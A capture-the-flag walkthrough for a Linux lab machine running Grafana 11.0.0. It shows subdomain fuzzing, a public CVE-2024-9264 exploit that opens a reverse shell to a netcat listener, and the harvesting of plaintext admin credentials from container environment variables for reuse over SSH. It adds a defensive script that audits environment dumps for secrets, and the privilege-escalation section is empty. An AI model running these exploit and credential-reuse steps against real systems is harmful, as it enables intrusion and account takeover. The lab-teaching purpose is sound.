Difficulty: Easy
OS: Linux
Points: 20
Date: 2025-05-10

📝 Initial Access Info

We begin this assessment with credentials commonly provided in real-life pentests:

Username: admin  
Password: 0D5oT70Fq13EvB5r

🔍 Reconnaissance

🔎 Nmap Scan

nmap -sV -sC -oN scan BOX-IP
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.11 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    nginx 1.24.0 (Ubuntu)
|_http-title: Edukate - Online Education Website
|_http-server-header: nginx/1.24.0 (Ubuntu)

🌐 Web Enumeration

📌 Main Site - http://planning.htb

  • Title: Edukate - Online Education Website

  • Web Server: nginx/1.24.0

🔎 Subdomain Discovery

Using ffuf with the top subdomain wordlist:
ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -H "Host: FUZZ.planning.htb" -u http://BOX-IP -ac -v

Found subdomain: grafana.planning.htb

⚙️ Grafana Exploitation

Upon visiting http://grafana.planning.htb, we identified:

  • Version: Grafana 11.0.0

  • Login using provided credentials failed

  • This version is vulnerable to CVE-2024-9264 (authenticated RCE)

https://github.com/z3k0sec/CVE-2024-9264-RCE-Exploit?tab=readme-ov-file

🧨 Exploiting CVE-2024-9264

Started listener:

nc -lvnp 9001

Executed exploit:

python poc.py --url http://grafana.planning.htb --username admin --password 0D5oT70Fq13EvB5r --reverse-ip YOUR-IP --reverse-port 9001

✅ Got reverse shell as root inside Docker container
⚠️ Note: This shell is inside a container, not the actual host.

🔐 Enumerating Environment

From within the container, we enumerated the environment variables with the env command and discovered SSH credentials for a real system user.

# env
GF_PATHS_HOME=/usr/share/grafana
HOSTNAME=7ce659d667d7
AWS_AUTH_EXTERNAL_ID=
SHLVL=1
HOME=/usr/share/grafana
AWS_AUTH_AssumeRoleEnabled=true
GF_PATHS_LOGS=/var/log/grafana
_=/usr/bin/sh
GF_PATHS_PROVISIONING=/etc/grafana/provisioning
GF_PATHS_PLUGINS=/var/lib/grafana/plugins
PATH=/usr/local/bin:/usr/share/grafana/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
AWS_AUTH_AllowedAuthProviders=default,keys,credentials
GF_SECURITY_ADMIN_PASSWORD=RioTecRANDEntANT!
AWS_AUTH_SESSION_DURATION=15m
GF_SECURITY_ADMIN_USER=enzo
GF_PATHS_DATA=/var/lib/grafana
GF_PATHS_CONFIG=/etc/grafana/grafana.ini
AWS_CW_LIST_METRICS_PAGE_LIMIT=500
PWD=/usr/share/grafana


We found:
Username: enzo  
Password: RioTecRANDEntANT!

ssh enzo@BOX-IP

🧠 User enzo exists on host — and we successfully logged in.
📄 User Flag: Found in /home/enzo/user.txt
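The weakness this path relies on is a Grafana admin password injected as a plain environment variable into the container and then reused as a host SSH password. The following audit script is an added example, not part of the original writeup: it parses an `env` dump like the one above and flags variables that look like inline secrets. The sample input is a trimmed copy of that output, and the secret-name patterns are the author's assumptions.

```python
import re

# Constructed sample: a trimmed copy of the `env` output from the container above.
SAMPLE_ENV = """\
GF_PATHS_HOME=/usr/share/grafana
HOSTNAME=7ce659d667d7
AWS_AUTH_EXTERNAL_ID=
AWS_AUTH_AssumeRoleEnabled=true
GF_SECURITY_ADMIN_PASSWORD=RioTecRANDEntANT!
GF_SECURITY_ADMIN_USER=enzo
AWS_AUTH_SESSION_DURATION=15m
GF_PATHS_CONFIG=/etc/grafana/grafana.ini
"""

# Variable names that usually carry a secret when the value is set inline (assumed patterns).
SECRET_KEY_RE = re.compile(r"(PASSWORD|PASSWD|SECRET|TOKEN|API_KEY|PRIVATE_KEY)", re.I)
# Names that hold a path to a secret rather than the secret itself; skip those.
FILE_REF_RE = re.compile(r"(__FILE|_FILE|_PATH)$", re.I)

def parse_env(text):
    """Parse KEY=VALUE lines as printed by `env`, splitting on the first '='."""
    env = {}
    for line in text.splitlines():
        if "=" not in line:
            continue
        key, _, value = line.partition("=")
        env[key.strip()] = value
    return env

def find_inline_secrets(env):
    """Return {key: value} for non-empty variables whose name suggests a secret."""
    hits = {}
    for key, value in env.items():
        if not value or FILE_REF_RE.search(key):
            continue
        if SECRET_KEY_RE.search(key):
            hits[key] = value
    return hits

def audit_report(text):
    """One finding per inline secret; Grafana GF_* settings can be read from a file via the __FILE suffix."""
    report = []
    for key, value in sorted(find_inline_secrets(parse_env(text)).items()):
        fix = f"use {key}__FILE with a mounted secret" if key.startswith("GF_") else "inject via a secrets mount"
        report.append(f"{key}: plaintext secret in environment (length {len(value)}); {fix}")
    return report

if __name__ == "__main__":
    for finding in audit_report(SAMPLE_ENV):
        print(finding)
```

Run it against `docker inspect` or `cat /proc/<pid>/environ` output (after converting NUL separators to newlines) to catch the same pattern across a fleet.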

📈 Privilege Escalation

If you want to make these articles yourself and get access to them then join our CTF team at: https://kaizenl.ink/ctf